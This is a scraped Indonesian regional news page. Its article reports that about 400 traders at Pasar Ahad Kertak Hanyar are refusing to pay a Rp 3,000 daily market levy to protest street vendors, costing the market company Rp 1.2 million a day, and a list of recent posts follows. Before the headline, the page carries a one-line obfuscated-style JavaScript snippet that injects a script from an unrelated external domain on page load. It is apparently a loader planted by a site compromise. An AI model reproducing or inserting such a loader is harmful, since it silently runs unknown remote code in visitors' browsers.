(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pedagang Pasar Ahad ‘Ngambek’ Setor Retribusi, PD Pasar Kehilangan Rp 1,2 Juta Perhari


MARTAPURA, Sedikitnya 400 pedagang Pasar Ahad Kertak Hanyar mogok bayar retribusi. Akibatnya, dalam satu hari Perusahaan Daerah (PD) Pasar Bauntung Batuah mengalami kehilangan pemasukan hingga Rp 1.200.000/hari. Begitu disampaikan Direktur PD Pasar Bauntung Batuah Martapura Rusdiansyah, Rabu (6/2).

“Sejak Jumat (2/2) kemarin hingga hari ini Rabu (6/2), seluruh pedagang Pasar Ahad yang berjualan di lantai satu dan dua tak bayar retribusi pasar, kalau dihitung-hitung mungkin ada sekitar 400 pedagang yang berjualan di sana,” akunya.

Adapun besaran retribusi yang dipungut kepada pedagang, dikatakan Rusdi sebesar Rp 3.000/hari/pedagang. Nah, apabila dikalkulasikan dengan 400 pedagang, maka kehilangan pemasukan yang dialami PD Pasar Bauntung Batuah mencapai Rp 1,2 juta perharinya.

Pedagang Pasar Ahad mogok bayar retribusi harian, lantaran protes keberadaan PKL di jalan Pemurus Kertak Hanyar Km 7 Kabupaten Banjar yang masih dijumpai berjualan, walaupun sebelumnya Satpol PP Banjar sudah melayangkan surat himbauan larangan berjualan. Bahkan pemantauan setiap hari hingga berjanji melakukan tindakan tegas jika hingga Senin (4/2) yang masih dijumpai kehadiran PKL di sana.

“Setiap hari pihak kita dari PD Pasar, juga mengintai kehadiran PKL di sekitar lokasi Pasar Ahad, tapi setiap hari mereka masih ada di sana, hari ini saja kita hitung ada sekitar 70 PKL yang masih berjualan di sana,” ujar Rusdi sambil memperlihatkan foto PKL pada Rabu (6/2) pagi kepada awak media.

Lalu bagaimana solusi menertibkan PKL di samping Pasar Ahad itu?, pihaknya hanya mengharapkan dan mengandalkan Satpol PP Banjar bisa bertindak tegas dan selalu melakukan pemantauan di jam-jam tertentu, mengingat penindakan tersebut merupakan kewenangan dari Satpol PP Banjar.

“Kita menyerahkan kepada Satpol PP Banjar agar bisa bertindak tergas dan membuat jera terhadap kehadiran PKL di sana. Sebab itu kewenangan Satpol PP Banjar,” pungkasnya.

Sementara itu, Ketua Komisi II DPRD Banjar Drs Kamaruzzaman usai rapat dengar pendapat dengan PD Pasar Bauntung Batuah membahas potensi PAD mengatakan, baru mendengar kabar tersebut. Ia berharap PD Pasar punya solusi cepat untuk menyelesaikan masalah tersebut.

“Jika iya berarti ada pendapatan PD Pasar yang tersumbat, nanti saya meminta PD Pasar untuk mengkomunikasikan hal tersebut dan bersama-sama mencarikan solusinya, saya berharap secepatnya diselesaikan,” ujarnya. (rendy)

Reporter:Rendy
Editor:Abi Zarrin Al Ghifari

Desy

Unit Cyber Kanal Kalimantan

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

12 menit ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

3 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

3 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

5 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

7 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

8 jam ago

This website uses cookies.